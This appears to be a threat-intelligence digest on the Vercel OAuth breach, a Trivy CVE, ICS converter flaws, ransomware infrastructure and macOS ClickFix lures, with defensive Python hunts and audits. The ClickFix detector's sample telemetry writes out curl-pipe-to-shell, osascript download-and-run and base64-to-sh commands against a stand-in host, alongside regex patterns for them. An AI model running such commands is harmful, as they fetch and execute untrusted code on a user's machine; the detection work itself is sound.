the threat gazette
Afternoon Update
Intraday Update
Cloud

Vercel OAuth Chain Gains State Attribution: Lazarus, Storm-2372, UNC5537 Join Scattered Spider; CALENDAR + Trivy KEV in Scope

CVE-2026-33634 Lazarus Group Scattered Spider Storm-2372 TeamPCP UNC5537 T1078 T1078.004 T1087 T1199 T1213 T1550.001 T1552.001 CALENDAR

Since last coverage, the Vercel OAuth breach has escalated significantly. Lazarus Group, Storm-2372, and UNC5537 are now attributed alongside the previously reported Scattered Spider, with seven ATT&CK techniques mapped, all centered on credential and OAuth token abuse (T1078.004, T1550.001, T1552.001) and internal data collection (T1213). Storm-2372's known specialization in OAuth device code flow attacks maps precisely to the T1550.001 application access token technique documented here, making that cluster the most technically coherent participant. CVE-2026-33634 in Aqua Security's Trivy scanner (EPSS 0.21, KEV-listed, past-due April 9 remediation window) is now associated with the operation, relevant because a vulnerability in a security scanning tool embedded in CI/CD pipelines creates a plausible vector for credential exfiltration from within trusted build infrastructure. CALENDAR malware attribution (a known DPRK implant family) and confirmed data breach status represent material escalations from the initial disclosure.
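As an added example (not code from this digest, from Vercel, or from any vendor cited here), the hunt below pulls successful OAuth device-code sign-ins out of Entra ID style sign-in records and rates each by whether the source IP has ever appeared on that user's ordinary sign-ins. Field names follow the Microsoft Graph signIn resource; the records are constructed, and the assumption that the recorded IP belongs to the client polling the token endpoint is stated in the code.

```python
"""Hunt for OAuth device-code sign-ins in Entra ID style sign-in logs.

Added example for this digest; it is not Vercel's, Microsoft's or Trend Micro's
code. Field names follow the Microsoft Graph signIn resource
(authenticationProtocol, userPrincipalName, ipAddress, appDisplayName,
createdDateTime, status.errorCode); the records below are constructed.
Assumption: the ipAddress on a device-code sign-in is the client that polled
the token endpoint, so a device-code grant from an IP the user has never
otherwise signed in from is the strongest single signal (T1550.001).
"""
import json
from collections import defaultdict
from datetime import datetime

# Constructed sample sign-ins (JSON lines), deliberately out of time order.
SAMPLE_SIGNINS = """
{"createdDateTime":"2026-04-20T08:02:11Z","userPrincipalName":"dev1@example.com","ipAddress":"203.0.113.10","authenticationProtocol":"oAuth2","appDisplayName":"Microsoft Teams","status":{"errorCode":0}}
{"createdDateTime":"2026-04-20T08:41:50Z","userPrincipalName":"dev1@example.com","ipAddress":"198.51.100.77","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Authentication Broker","status":{"errorCode":0}}
{"createdDateTime":"2026-04-20T09:15:03Z","userPrincipalName":"ops2@example.com","ipAddress":"203.0.113.22","authenticationProtocol":"deviceCode","appDisplayName":"Azure CLI","status":{"errorCode":0}}
{"createdDateTime":"2026-04-20T07:30:00Z","userPrincipalName":"ops2@example.com","ipAddress":"203.0.113.22","authenticationProtocol":"oAuth2","appDisplayName":"Office 365 Exchange Online","status":{"errorCode":0}}
{"createdDateTime":"2026-04-20T10:00:00Z","userPrincipalName":"dev1@example.com","ipAddress":"198.51.100.77","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Authentication Broker","status":{"errorCode":50126}}
"""


def parse_signins(text):
    """Parse JSON-lines sign-in records and return them in chronological order."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["_ts"] = datetime.strptime(ev["createdDateTime"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return sorted(events, key=lambda e: e["_ts"])


def hunt_device_code(events):
    """Return one finding per successful device-code sign-in.

    Severity is 'high' when the source IP never appeared on the user's earlier
    successful non-device-code sign-ins, else 'medium'. In production, feed
    about 30 days of history ahead of the window under review so the baseline
    is meaningful.
    """
    seen_ips = defaultdict(set)  # user -> IPs from successful, non-device-code sign-ins
    findings = []
    for ev in events:
        user, ip = ev["userPrincipalName"], ev["ipAddress"]
        ok = ev["status"]["errorCode"] == 0
        if ev["authenticationProtocol"] != "deviceCode":
            if ok:
                seen_ips[user].add(ip)
            continue
        if not ok:
            continue  # a failed exchange issued no token; count it for volume stats, not here
        findings.append({
            "time": ev["createdDateTime"],
            "user": user,
            "ip": ip,
            "app": ev["appDisplayName"],
            "severity": "high" if ip not in seen_ips[user] else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in hunt_device_code(parse_signins(SAMPLE_SIGNINS)):
        print(f"{f['severity']:6} {f['time']} {f['user']} from {f['ip']} via {f['app']}")
```

On the constructed data this yields two findings: the dev1 grant from an IP never seen on that user's normal sign-ins rates high, the ops2 grant from their usual address rates medium, and the failed 10:00 exchange is dropped because no token was issued. A follow-on pivot worth wiring in is bulk Graph or SharePoint reads by the same user within the hour, which is the T1213 half of the chain.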

The four-actor attribution (Scattered Spider, Lazarus, Storm-2372, UNC5537) warrants scrutiny: Trend Micro's analyses of complex incidents routinely cite multiple actors as precedent or comparison, and not all of them will have been direct participants. Storm-2372 and Scattered Spider are the most coherent attributions given the OAuth attack chain; Lazarus's CALENDAR implant, if confirmed on Vercel infrastructure, suggests either independent DPRK access or downstream exploitation of credentials exfiltrated by the initial actor. What matters for financial services exposure is that Vercel is the steward of Next.js and a significant slice of JavaScript OSS ecosystem infrastructure; environment variable exfiltration from that position has a potential blast radius well beyond Vercel's own internal systems if the threatened supply chain pivot materializes. The sibling stories (6585, 6586) cover the Scattered Spider initial access angle.

Four named actors on a single incident is attribution past the point of coherence — the most technically defensible reading is that Storm-2372's OAuth device-code specialty drove initial entry (T1550.001 maps cleanly), Scattered Spider owned the social-engineering front, and the Lazarus CALENDAR artefact reflects downstream exploitation of exfiltrated credentials rather than joint operation. The real story is unchanged from the morning and getting worse: DPRK implants showing up inside the Next.js steward's blast radius while the attacker publicly threatens cascading supply-chain moves into Vercel-owned JS libraries. CVE-2026-33634 in Trivy landing in this cluster is the confirmation that scanner-in-CI is a live credential-exfil surface, not a theoretical one.
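The scanner-in-CI exposure is easier to reason about as a concrete pipeline review. The audit below is an added example rather than Trivy's, GitHub's or Vercel's tooling: it reads a constructed GitHub Actions workflow and reports actions not pinned to a full commit SHA, repository secrets handed to steps that run third-party actions, and a write-all token grant. The parser is a minimal regex pass that assumes the conventional step layout, and FIRST_PARTY_OWNERS is an assumed allowlist.

```python
"""Audit a GitHub Actions workflow for scanner-in-CI credential exposure.

Added example for this digest, not Trivy's, GitHub's or Vercel's own tooling.
Three checks a pipeline reviewer wants after an incident like this one:
  * every remote action is pinned to a 40-hex commit SHA, not a tag or branch;
  * repository secrets are not passed to steps that run third-party actions;
  * the workflow does not grant the job token 'write-all'.
The workflow text is constructed. The parser is a deliberately minimal regex
pass (no PyYAML dependency) that assumes the usual '- uses:' / '- name:' step
layout. FIRST_PARTY_OWNERS is an assumed allowlist to adapt per organisation.
"""
import re

FIRST_PARTY_OWNERS = {"actions", "github"}  # assumption: owners treated as first-party

# Constructed workflow, not a real repository's file.
SAMPLE_WORKFLOW = """
name: ci
on: [push]
permissions: write-all
jobs:
  scan-and-publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Scan filesystem
        uses: aquasecurity/trivy-action@master
        with:
          scan-type: fs
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
      - name: Publish
        run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

STEP_START = re.compile(r"^\s*-\s+\w")                 # '- uses:' / '- name:' opens a step
USES = re.compile(r"^\s*(?:-\s+)?uses:\s*(\S+)")
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.")
SHA_PIN = re.compile(r"^[0-9a-f]{40}$")


def split_steps(workflow):
    """Group workflow lines into steps; lines before the first step are ignored."""
    steps, current = [], None
    for line in workflow.splitlines():
        if STEP_START.match(line):
            current = []
            steps.append(current)
        if current is not None:
            current.append(line)
    return steps


def step_uses(step):
    """Return the 'uses:' reference of a step, or None for plain 'run:' steps."""
    for line in step:
        m = USES.match(line)
        if m:
            return m.group(1)
    return None


def audit_workflow(workflow):
    """Return (rule, detail) findings for the workflow text, in document order."""
    findings = []
    if re.search(r"^permissions:\s*write-all", workflow, re.M):
        findings.append(("write-all-permissions", "GITHUB_TOKEN granted write-all at workflow level"))
    for step in split_steps(workflow):
        uses = step_uses(step)
        if uses is None or uses.startswith(("./", "docker://")):
            continue  # 'run' steps and local/docker actions are out of scope here
        name, _, ref = uses.partition("@")
        owner = name.split("/", 1)[0]
        if not SHA_PIN.match(ref):
            findings.append(("unpinned-action", f"{uses} is pinned to a mutable ref, not a commit SHA"))
        if owner not in FIRST_PARTY_OWNERS and any(SECRET_REF.search(l) for l in step):
            findings.append(("secret-to-third-party-action", f"{uses} receives repository secrets"))
    return findings


if __name__ == "__main__":
    for rule, detail in audit_workflow(SAMPLE_WORKFLOW):
        print(f"{rule}: {detail}")
```

Against the constructed workflow this reports the write-all grant, both mutable pins, and the publish token handed to the scanner step. The scanner never needs NPM_TOKEN to scan a filesystem; moving the secret to the publish step alone removes the path by which a compromised scanner reads it, and pinning the action to a reviewed commit SHA with `permissions: contents: read` at the top closes the other two.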

2026-04-12 (1 source): + CVE-2026-33634 · + LAPSUS$ · + Scattered Spider · + TeamPCP · + UNC1069 · + UNC6780
2026-04-17 (1 source)
2026-04-21 (1 source): + Lazarus Group · + Storm-2372 · + UNC5537 · + T1078 · + T1078.004 · + T1087 · + T1199 · + T1213 · + T1550.001 · + T1552.001

Editorial

Today's through-line is convergence at both the infrastructure and tradecraft layers. The spilled SystemBC C2 serving 1,570 victims across Akira, Cl0p, INC Ransom, and Qilin concurrently is not four coincidences — four nominally distinct RaaS programs homed on one node points to either a shared initial-access broker or a shared affiliate cohort, and either reading compresses the "independent crew" framing we apply to ransomware attribution. Sandworm picking up the macOS ClickFix/AppleScript stealer playbook Lazarus shipped earlier this cycle promotes that delivery from DPRK novelty to cross-actor tradecraft inside 24 hours — GRU and Pyongyang do not usually share notes, so the technique has reached commodity velocity considerably faster than the ClickFix-on-Windows arc did, and the exposed target class remains developer and DevOps macOS fleets.

The Vercel attribution expanded from two actors to four — Lazarus, Storm-2372, and UNC5537 now sit alongside Scattered Spider, with DPRK CALENDAR implant linked and Trivy (CVE-2026-33634, freshly KEV) in-scope as a plausible CI/CD credential-exfil path. That is not coherent single-incident attribution; treat it as credential resale out of the original intrusion into opportunistic state and e-crime buyers — the logical endpoint of the "tokens on secondary markets" note from the 20th — and note that DPRK tooling sitting downstream of the Next.js steward is a blast radius the ecosystem is not modelling. Tylerb's plea is the third Scattered Spider-adjacent prosecution in a week against an operation that is still live in Vercel telemetry, so the arrests-as-lagging-indicator read is sufficiently established that we should stop expecting prosecution cadence to perturb cohort tempo.

Notable

Social Engineering

First Guilty Plea from November 2024 Scattered Spider Indictment — Tyler Buchanan ('Tylerb')

Scattered Spider PLEAD

Tyler Robert Buchanan (handle: 'Tylerb'), 24, pleaded guilty to wire fraud conspiracy and aggravated identity theft covering SMS phishing campaigns from summer 2022 that compromised at least a dozen major technology companies and enabled tens of millions in cryptocurrency theft from investors. This is the first guilty plea from the five-defendant indictment unsealed by DOJ in November 2024, making it the most significant legal milestone in the Scattered Spider prosecution to date. Krebs on Security provides the richest public account, including Buchanan's specific handle and operational role.

Four co-defendants from the November 2024 indictment remain unresolved; whether they are contesting the charges or remain subject to outstanding warrants will affect the timeline of any cooperation intelligence. The fact that Buchanan's plea covers activity through April 2023 while Scattered Spider operations have continued actively since (including the concurrent Vercel breach) underscores that prosecution of this cohort has not degraded the group's broader operational capability.

Buchanan's plea covers activity through April 2023; Scattered Spider was executing against Vercel mid-plea. That is the entire story about The Com's structure — decentralised, pseudonymous, no single node whose prosecution degrades cohort capability. Cooperation terms, if any exist, are the piece to watch; the four unresolved co-defendants from the same indictment are the second. Stories 6777 and 6587 cover the same event at lower fidelity.

Supply Chain

Vercel Confirms Third-Party AI Tool as Entry Vector; Attacker Threatens Cascading Supply-Chain Attacks via Owned JS Libraries

Scattered Spider

Vercel disclosed an intrusion traced to a third-party AI tool installed on an employee device — a trusted relationship (T1199) entry vector that bypassed Vercel's own perimeter controls entirely. The threat actor, initially attributed to Scattered Spider, claimed possession of internal databases and multiple employee account credentials, and explicitly threatened cascading supply chain attacks via Vercel-owned libraries, including at least one already integrated into major downstream JavaScript projects. The Record's coverage confirms the basic incident timeline but is thin on technical specifics, consistent with an investigation still in early stages at time of publication.

The 'third-party AI tool' framing is deliberately vague — this is characterization for a live investigation under legal scrutiny. The operationally significant structural failure is identical to the UNC5537/Snowflake campaign pattern: employee-installed, presumably unblocked tooling serving as the entry point into cloud credential stores. Whether the AI tool was the actual breach vector or a cover story for a more complex initial access path will matter for downstream detection work.

The structural failure — employee-installed unblocked tooling as cloud-credential entry — is the UNC5537/Snowflake pattern rerun with AI tooling as the new unmanaged client. The explicit downstream threat against Vercel-owned JS libraries is the part worth modelling concretely: Next.js and SWC are the obvious targets, and any build pulling from Vercel-hosted infra during the compromise window inherits the exposure.
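To turn the blast-radius question into something a build team can answer today, the following added example (not Vercel's, npm's or any project's code) walks a package-lock.json and lists every installed package whose name falls under an assumed Vercel-stewarded watchlist, flagging entries with no integrity hash or resolved from outside the public registry. The lockfile is constructed and the hashes are placeholders.

```python
"""Enumerate what a build pulls from the Vercel-maintained part of the npm tree.

Added example for this digest, not Vercel's, npm's or Next.js's code. Given a
package-lock.json with a 'packages' map (lockfileVersion 2 or 3), it lists
every installed copy of a watchlisted package, including nested copies, and
flags entries that have no integrity hash or that resolve somewhere other
than the public registry. WATCH_EXACT and WATCH_SCOPES are assumptions drawn
from the names this digest mentions (Next.js, SWC, Vercel scopes); extend them
for your own dependency review. The lockfile below is constructed and the
'sha512-PLACEHOLDER' values stand in for real hashes.
"""
import json

WATCH_EXACT = {"next"}                 # assumption: exact package names to review
WATCH_SCOPES = ("@swc/", "@vercel/")   # assumption: scopes to review
REGISTRY = "https://registry.npmjs.org/"

# Constructed lockfile fragment; versions are illustrative, hashes are placeholders.
SAMPLE_LOCKFILE = json.dumps({
    "name": "web",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "web", "dependencies": {"next": "^14.0.0"}},
        "node_modules/next": {
            "version": "14.0.0",
            "resolved": "https://registry.npmjs.org/next/-/next-14.0.0.tgz",
            "integrity": "sha512-PLACEHOLDER",
        },
        "node_modules/@swc/helpers": {
            "version": "0.5.0",
            "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.0.tgz",
        },
        "node_modules/@vercel/og": {
            "version": "0.6.0",
            "resolved": "https://mirror.example.invalid/@vercel/og/-/og-0.6.0.tgz",
            "integrity": "sha512-PLACEHOLDER",
        },
        "node_modules/react": {
            "version": "18.2.0",
            "resolved": "https://registry.npmjs.org/react/-/react-18.2.0.tgz",
            "integrity": "sha512-PLACEHOLDER",
        },
        "node_modules/next/node_modules/@swc/helpers": {  # nested copy, reviewed too
            "version": "0.4.0",
            "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.4.0.tgz",
            "integrity": "sha512-PLACEHOLDER",
        },
    },
})


def package_name(path):
    """'node_modules/next/node_modules/@swc/helpers' -> '@swc/helpers'."""
    return path.rsplit("node_modules/", 1)[-1]


def on_watchlist(name):
    return name in WATCH_EXACT or name.startswith(WATCH_SCOPES)


def review_lockfile(text):
    """Return one record per watchlisted install, each with a list of issues."""
    lock = json.loads(text)
    if "packages" not in lock:
        raise ValueError("lockfileVersion 2 or 3 with a 'packages' map is required")
    report = []
    for path, meta in lock["packages"].items():
        if not path:
            continue  # the root project entry
        name = package_name(path)
        if not on_watchlist(name):
            continue
        issues = []
        if "integrity" not in meta:
            issues.append("no integrity hash")
        if not meta.get("resolved", "").startswith(REGISTRY):
            issues.append("resolved outside public registry")
        report.append({"path": path, "name": name, "version": meta.get("version"), "issues": issues})
    return report


if __name__ == "__main__":
    for r in review_lockfile(SAMPLE_LOCKFILE):
        status = ", ".join(r["issues"]) or "ok"
        print(f"{r['name']}@{r['version']} ({r['path']}): {status}")
```

The output is the list to compare against the versions and publish dates the steward confirms as clean once the compromise window is known; an entry without an integrity hash cannot be verified at install time at all, and one resolved from a mirror inherits whatever that mirror served during the window.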

ICS/OT

BRIDGE:BREAK: 22 CVEs in Lantronix and Silex Serial-to-IP Converters, One Exploit Live Since 2015

CVE-2015-5621 CVE-2024-24487 CVE-2025-67034 CVE-2025-67035 CVE-2025-67036 CVE-2025-67037 CVE-2025-67038 CVE-2025-67039 CVE-2025-67041 CVE-2025-70082 CVE-2026-32955 CVE-2026-32956 CVE-2026-32957 CVE-2026-32958 CVE-2026-32959 CVE-2026-32960 CVE-2026-32961 CVE-2026-32962 CVE-2026-32963 CVE-2026-32964 CVE-2026-32965

Security research branded 'BRIDGE:BREAK' has disclosed 22 vulnerabilities across Lantronix and Silex serial-to-IP converter product lines, with approximately 20,000 devices estimated to be internet-exposed. CVE-2015-5621 is the most immediately actionable finding: EPSS 0.178, a public exploit (EDB-45547), and a decade of unpatched exposure on research that is now fully weaponized. The 2025 and 2026 CVEs (the CVE-2025-67034 to CVE-2025-70082 set and CVE-2026-32955 to CVE-2026-32965) are new with this disclosure, with no public exploit code and sub-0.001 EPSS, but their presence in internet-facing OT bridge devices changes the risk calculus regardless of score.

Serial-to-IP converters are the connective tissue between legacy serial-bus OT equipment and IP networks — compromise grants bidirectional access to both the IP network and the serial-connected industrial devices downstream. CVE-2015-5621 being exploit-available on 20,000 internet-exposed industrial devices in 2026 is the actual story here; the fresh 2026 CVEs are operationally secondary until weaponization materializes. Per our standard ICS posture, CVSS/EPSS are secondary signals for network-edge OT gear — any Lantronix DeviceLinx or Silex SX-series exposure on your network edge should be treated as priority regardless of score.

CVSS/EPSS are the wrong instruments on OT bridge devices — these are the connective tissue between IP and serial-bus industrial gear, and compromise is bidirectional lateral movement by design. The 2015 exploit-available-on-20k-internet-exposed figure is the actionable number; the 2025–2026 CVE set is secondary until weaponised. If Lantronix DeviceLinx or Silex SX-series sit anywhere on the edge, they need eyes regardless of score.

Ransomware

SystemBC C2 Compromise Spills 1,570-Victim Dataset Across Akira, Cl0p, INC Ransom, and Qilin

Akira Cl0p INC Ransom Qilin Cobalt Strike

A compromised SystemBC C2 server attributed to an operation dubbed 'The Gentlemen' has yielded a victim database of 1,570+ entries spanning four active ransomware operations: Akira, Cl0p, INC Ransom, and Qilin. SystemBC is a well-established proxy/backdoor widely deployed by ransomware affiliates for C2 obfuscation and persistence, and its concurrent use across four named operations from a single infrastructure node suggests shared affiliate relationships or a common IAB supplying multiple gangs simultaneously rather than four independent campaigns. The Cl0p presence is specifically relevant to financial services given that group's demonstrated pattern of exploiting managed file transfer vulnerabilities (MOVEit, GoAnywhere) at scale.

The analytical signal here is the multi-gang infrastructure overlap from a single C2 node, which reflects contemporary ransomware affiliate market dynamics: the same individuals routinely operate across multiple RaaS programs, and their infrastructure overlaps accordingly. The 1,570-victim dataset's intelligence value decays rapidly as gangs cycle C2 infrastructure — the question is whether this has already been actioned by LE or researchers and whether affected organizations have been notified, which the current coverage doesn't establish.

Four active RaaS programs operating out of one SystemBC node is the contemporary affiliate-market signal made unusually legible — shared IAB feed or overlapping affiliate rosters, take your pick, both conclusions are uncomfortable. Cl0p's presence matters specifically because the group's MFT-appliance playbook (MOVEit, GoAnywhere) is the threat model that keeps regulated-data workloads awake. Victim-list intel perishes quickly as gangs cycle infrastructure; the structural read outlasts the IOCs.

Social Engineering

Sandworm Adopts macOS ClickFix for Credential and Wallet Stealers — Same Playbook as Lazarus This Cycle

Sandworm Team

Sandworm Team is running macOS-targeted ClickFix attacks delivering AppleScript-based credential and cryptocurrency wallet stealers. The delivery chain mirrors the Lazarus 'Mach-O Man' kit reported in this morning's digest — same platform, same social-engineering primitive, same target class (developer and DevOps macOS fleets and crypto-adjacent users), landing inside the same 24-hour window from an unrelated state-adjacent crew.

Cross-actor adoption on this timescale moves ClickFix-on-macOS out of the novelty column and into standard tradecraft. GRU and RGB converging on the same macOS delivery primitive on the same day is not coincidence — it's ambient technique diffusion catching up to a platform that finally has enough high-value endpoints to justify the investment. Detection engineering on ClickFix should generalise to macOS immediately if it hasn't already.
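As an added example of what that macOS generalisation looks like in practice (not Sandworm-, Lazarus- or vendor-specific code), the rules below run over constructed process-execution telemetry and flag the three shapes a pasted lure usually takes: a URL piped into an interpreter, an inline osascript 'do shell script', and base64-decoded content piped into a shell. The record field names are an assumed shape to map an EDR or Endpoint Security process-exec feed onto, and the set of parent-process names treated as interactive terminals is an assumption too.

```python
"""Flag macOS ClickFix-style executions in process-exec telemetry.

Added example for this digest; not Sandworm-, Lazarus- or vendor-specific
code, and the telemetry is constructed. Record fields (ts, user, parent_name,
process_name, command_line) are an assumed shape that any EDR or Endpoint
Security process-exec feed can be mapped onto. A ClickFix lure ends with the
user pasting a command into a terminal, so a match whose parent is an
interactive terminal is rated high; the same command under a CI agent or
package manager is rated medium for review rather than paging.
"""
import json
import re

TERMINALS = {"Terminal", "iTerm2", "Warp"}  # assumption: parents where a pasted lure lands
INTERPRETERS = r"(?:ba|z|k)?sh|osascript|python3?|perl|ruby"

RULES = [
    ("url-piped-to-interpreter",
     re.compile(r"https?://\S+.*\|\s*(?:sudo\s+)?(?:" + INTERPRETERS + r")\b", re.I)),
    ("osascript-inline-shell",
     re.compile(r"osascript\s+(?:.*\s)?-e\s+.*do shell script", re.I)),
    ("base64-decoded-to-interpreter",
     re.compile(r"base64\s+(?:-D|-d|--decode).*\|\s*(?:" + INTERPRETERS + r")\b", re.I)),
]

# Constructed events (JSON lines); hosts under example.invalid are not real.
SAMPLE_EVENTS = r"""
{"ts":"2026-04-21T14:02:01Z","user":"dev","parent_name":"Terminal","process_name":"bash","command_line":"bash -c \"curl -fsSL https://example.invalid/fix.sh | bash\""}
{"ts":"2026-04-21T14:05:30Z","user":"dev","parent_name":"Terminal","process_name":"osascript","command_line":"osascript -e 'do shell script \"curl -s https://example.invalid/p -o /tmp/p && chmod +x /tmp/p && /tmp/p\"'"}
{"ts":"2026-04-21T14:06:00Z","user":"dev","parent_name":"Xcode","process_name":"osascript","command_line":"osascript /Users/dev/scripts/notify.scpt"}
{"ts":"2026-04-21T14:07:00Z","user":"root","parent_name":"launchd","process_name":"sh","command_line":"/bin/sh -c \"ls -la /var/log\""}
{"ts":"2026-04-21T14:09:12Z","user":"dev","parent_name":"iTerm2","process_name":"zsh","command_line":"zsh -c \"echo aGVsbG8K | base64 -D | sh\""}
{"ts":"2026-04-21T14:10:00Z","user":"dev","parent_name":"Finder","process_name":"curl","command_line":"curl -O https://example.invalid/report.pdf"}
{"ts":"2026-04-21T14:12:00Z","user":"ci","parent_name":"java","process_name":"sh","command_line":"sh -c \"curl -fsSL https://example.invalid/install.sh | sh\""}
"""


def parse_events(text):
    """Parse JSON-lines process-exec records."""
    return [json.loads(line) for line in text.strip().splitlines()]


def detect_clickfix(events):
    """Return one finding per event that trips at least one rule."""
    findings = []
    for ev in events:
        cmd = ev["command_line"]
        matched = [name for name, rx in RULES if rx.search(cmd)]
        if not matched:
            continue
        findings.append({
            "ts": ev["ts"],
            "user": ev["user"],
            "parent": ev["parent_name"],
            "rules": matched,
            "severity": "high" if ev["parent_name"] in TERMINALS else "medium",
            "command_line": cmd,
        })
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(parse_events(SAMPLE_EVENTS)):
        print(f"{f['severity']:6} {f['ts']} {f['user']} <{f['parent']}> {','.join(f['rules'])}: {f['command_line']}")
```

On the constructed feed the plain download, the compiled notify script and the launchd housekeeping stay quiet; the three pasted commands rate high, and the same curl-pipe-sh under a CI agent rates medium, which is the tuning point most fleets need since installers use that idiom legitimately. Keying on the command shape rather than any one domain is what lets the same rule cover both the Lazarus and Sandworm lures.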

Briefs